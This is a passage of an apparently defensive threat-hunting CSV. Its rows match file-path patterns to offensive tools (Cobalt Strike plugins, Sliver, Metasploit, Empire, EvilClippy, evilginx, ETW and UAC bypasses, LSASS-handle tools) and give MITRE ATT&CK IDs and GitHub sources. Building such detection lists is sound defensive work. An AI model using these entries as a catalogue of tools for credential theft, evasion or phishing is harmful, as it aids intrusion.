security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/EnumCLR.c*,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOF to identify processes with the CLR loaded with a goal of identifying SpawnTo / injection candidates.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://gist.github.com/G0ldenGunSec/8ca0e853dd5637af2881697f8de6aecc,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*/enumerate.cna*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Aggressor script function and alias to perform some rudimentary Windows host enumeration with Beacon built-in commands,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - 
T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/red-team-scripts,1,1,N/A,10,10,1089,197,2019-11-18T05:30:18Z,2017-05-01T13:53:05Z -*/enumerate/enumerate.py*,offensive_tool_keyword,gato,GitHub Self-Hosted Runner Enumeration and Attack Tool,T1083 - T1087 - T1081,TA0006 - TA0007,N/A,N/A,Reconnaissance,https://github.com/praetorian-inc/gato,1,0,N/A,N/A,3,263,24,2023-07-27T15:15:32Z,2023-01-06T15:43:27Z -*/enumeration/azureAd.py*,offensive_tool_keyword,Vajra,Vajra is a UI based tool with multiple techniques for attacking and enumerating in target's Azure environment,T1087 - T1098 - T1583 - T1078 - T1110 - T1566 - T1537 - T1020 - T1526 - T1482,TA0003 - TA0006 - TA0007 - TA0008 - TA0009,N/A,N/A,Exploitation tools,https://github.com/TROUBLE-1/Vajra,1,1,N/A,N/A,4,336,57,2023-03-16T09:45:53Z,2022-03-01T14:31:27Z -*/enumeration/azureAzService.py*,offensive_tool_keyword,Vajra,Vajra is a UI based tool with multiple techniques for attacking and enumerating in target's Azure environment,T1087 - T1098 - T1583 - T1078 - T1110 - T1566 - T1537 - T1020 - T1526 - T1482,TA0003 - TA0006 - TA0007 - TA0008 - TA0009,N/A,N/A,Exploitation 
tools,https://github.com/TROUBLE-1/Vajra,1,1,N/A,N/A,4,336,57,2023-03-16T09:45:53Z,2022-03-01T14:31:27Z -*/enumeration/subdomain.py*,offensive_tool_keyword,Vajra,Vajra is a UI based tool with multiple techniques for attacking and enumerating in target's Azure environment,T1087 - T1098 - T1583 - T1078 - T1110 - T1566 - T1537 - T1020 - T1526 - T1482,TA0003 - TA0006 - TA0007 - TA0008 - TA0009,N/A,N/A,Exploitation tools,https://github.com/TROUBLE-1/Vajra,1,1,N/A,N/A,4,336,57,2023-03-16T09:45:53Z,2022-03-01T14:31:27Z -*/enumeration/userenum.py*,offensive_tool_keyword,Vajra,Vajra is a UI based tool with multiple techniques for attacking and enumerating in target's Azure environment,T1087 - T1098 - T1583 - T1078 - T1110 - T1566 - T1537 - T1020 - T1526 - T1482,TA0003 - TA0006 - TA0007 - TA0008 - TA0009,N/A,N/A,Exploitation tools,https://github.com/TROUBLE-1/Vajra,1,1,N/A,N/A,4,336,57,2023-03-16T09:45:53Z,2022-03-01T14:31:27Z -*/epmd-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/eppc-enum-processes.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/Erebus/*.dll*,offensive_tool_keyword,cobaltstrike,Erebus CobaltStrike post penetration testing plugin,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/DeEpinGh0st/Erebus,1,1,N/A,10,10,1356,214,2021-10-28T06:20:51Z,2019-09-26T09:32:00Z -*/Erebus/*.exe*,offensive_tool_keyword,cobaltstrike,Erebus CobaltStrike post penetration testing plugin,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - 
T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/DeEpinGh0st/Erebus,1,1,N/A,10,10,1356,214,2021-10-28T06:20:51Z,2019-09-26T09:32:00Z -*/Erebus-email.*,offensive_tool_keyword,cobaltstrike,Erebus CobaltStrike post penetration testing plugin,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/DeEpinGh0st/Erebus,1,1,N/A,10,10,1356,214,2021-10-28T06:20:51Z,2019-09-26T09:32:00Z -*/etc/passwd*/.sudo_as_admin_successful*,offensive_tool_keyword,linux-smart-enumeration,Linux enumeration tool for privilege 
escalation and discovery,T1087.004 - T1016 - T1548.001 - T1046,TA0007 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/diego-treitos/linux-smart-enumeration,1,0,N/A,9,10,2924,535,2023-09-17T10:27:49Z,2019-02-13T11:02:21Z -*/EternalHushCore.dll*,offensive_tool_keyword,EternalHushFramework,EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems,T1071.001 - T1132.001 - T1059.003 - T1547.001,TA0011 - TA0005 - TA0010 - TA0002,N/A,N/A,C2,https://github.com/APT64/EternalHushFramework,1,1,N/A,10,10,140,21,2023-09-21T19:04:41Z,2023-07-09T09:13:21Z -*/EternalHushFramework.git*,offensive_tool_keyword,EternalHushFramework,EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems,T1071.001 - T1132.001 - T1059.003 - T1547.001,TA0011 - TA0005 - TA0010 - TA0002,N/A,N/A,C2,https://github.com/APT64/EternalHushFramework,1,1,N/A,10,10,140,21,2023-09-21T19:04:41Z,2023-07-09T09:13:21Z -*/etumbot.profile*,offensive_tool_keyword,cobaltstrike,Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. 
These profiles work with Cobalt Strike 3.x,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/Malleable-C2-Profiles,1,1,N/A,10,10,1362,429,2021-05-18T14:45:39Z,2014-07-14T15:02:42Z -*/etw.cna,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - 
Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/ajpc500/BOFs,1,1,N/A,10,10,475,115,2022-11-01T14:51:07Z,2020-12-19T11:21:40Z -*/etw.x64.*,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/ajpc500/BOFs,1,1,N/A,10,10,475,115,2022-11-01T14:51:07Z,2020-12-19T11:21:40Z -*/etw.x86.*,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - 
T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/ajpc500/BOFs,1,1,N/A,10,10,475,115,2022-11-01T14:51:07Z,2020-12-19T11:21:40Z -*/etw-fuck.cpp*,offensive_tool_keyword,Fuck-Etw,Bypass the Event Trace Windows(ETW) and unhook ntdll.,T1070.004 - T1055.001,TA0005 - TA0003,N/A,N/A,Defense Evasion,https://github.com/unkvolism/Fuck-Etw,1,1,N/A,10,1,63,9,2023-09-29T21:19:10Z,2023-09-25T18:59:10Z -*/etw-fuck.exe*,offensive_tool_keyword,Fuck-Etw,Bypass the Event Trace Windows(ETW) and unhook ntdll.,T1070.004 - T1055.001,TA0005 - TA0003,N/A,N/A,Defense Evasion,https://github.com/unkvolism/Fuck-Etw,1,1,N/A,10,1,63,9,2023-09-29T21:19:10Z,2023-09-25T18:59:10Z -*/ETWHash/*,offensive_tool_keyword,ETWHash,C# POC to extract NetNTLMv1/v2 hashes from ETW provider,T1556.001,TA0009 ,N/A,N/A,Credential Access,https://github.com/nettitude/ETWHash,1,1,N/A,N/A,3,229,27,2023-05-10T06:45:06Z,2023-04-26T15:53:01Z -*/evasion/evasion.go,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*/evasion/windows/*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. 
and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,0,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/evasion_linux.go*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*/evasion_windows.go*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*/EventViewerUAC/*,offensive_tool_keyword,cobaltstrike,Beacon Object File implementation of Event Viewer deserialization UAC bypass,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - 
T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/netero1010/TrustedPath-UACBypass-BOF,1,1,N/A,10,10,104,33,2021-08-16T07:49:55Z,2021-08-07T03:40:33Z -*/EventViewerUAC/*,offensive_tool_keyword,cobaltstrike,Beacon Object File implementation of Event Viewer deserialization UAC bypass,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider 
- APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Octoberfest7/EventViewerUAC_BOF,1,1,N/A,10,10,130,29,2022-05-06T17:43:05Z,2022-05-02T02:08:52Z -*/EventViewer-UACBypass*,offensive_tool_keyword,EventViewer-UACBypass,RCE through Unsafe .Net Deserialization in Windows Event Viewer which leads to UAC bypass,T1078.004 - T1216 - T1068,TA0004 - TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/CsEnox/EventViewer-UACBypass,1,1,N/A,10,2,108,21,2022-04-29T09:42:37Z,2022-04-27T12:56:59Z -*/evil.cpp*,offensive_tool_keyword,cobaltstrike,CS anti-killing including python version and C version,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Gality369/CS-Loader,1,1,N/A,10,10,751,149,2021-08-11T06:43:52Z,2020-08-17T21:33:06Z -*/evil.dll*,offensive_tool_keyword,localpotato,The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. 
This attack allows for arbitrary file read/write and elevation of privilege.,T1550.002 - T1078.003 - T1005 - T1070.004,TA0004 - TA0006 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/decoder-it/LocalPotato,1,0,N/A,10,5,463,69,2023-02-12T18:39:49Z,2023-01-04T18:22:29Z -*/evil_pdf/*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*/EvilClippy*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*/evilclippy.cs*,offensive_tool_keyword,EvilClippy,A cross-platform assistant for creating malicious MS Office documents,T1566.001 - T1059.001 - T1204.002,TA0004 - TA0002,N/A,N/A,Phishing,https://github.com/outflanknl/EvilClippy,1,1,N/A,10,10,1956,381,2022-05-19T23:00:22Z,2019-03-26T12:14:03Z -*/EvilClippy.git*,offensive_tool_keyword,EvilClippy,A cross-platform assistant for creating malicious MS Office documents,T1566.001 - T1059.001 - T1204.002,TA0004 - TA0002,N/A,N/A,Phishing,https://github.com/outflanknl/EvilClippy,1,1,N/A,10,10,1956,381,2022-05-19T23:00:22Z,2019-03-26T12:14:03Z -*/evilginx*,offensive_tool_keyword,gophish,Combination of evilginx2 and GoPhish,T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113,TA0002 - TA0003,N/A,N/A,Credential Access - Collection,https://github.com/fin3ss3g0d/evilgophish,1,1,N/A,N/A,10,1308,237,2023-09-13T23:44:48Z,2022-09-07T02:47:43Z -*/evilhost:*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Exploit-JBoss.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*/EvilLsassTwin/*,offensive_tool_keyword,EvilLsassTwin,attempt to duplicate open handles to LSASS. 
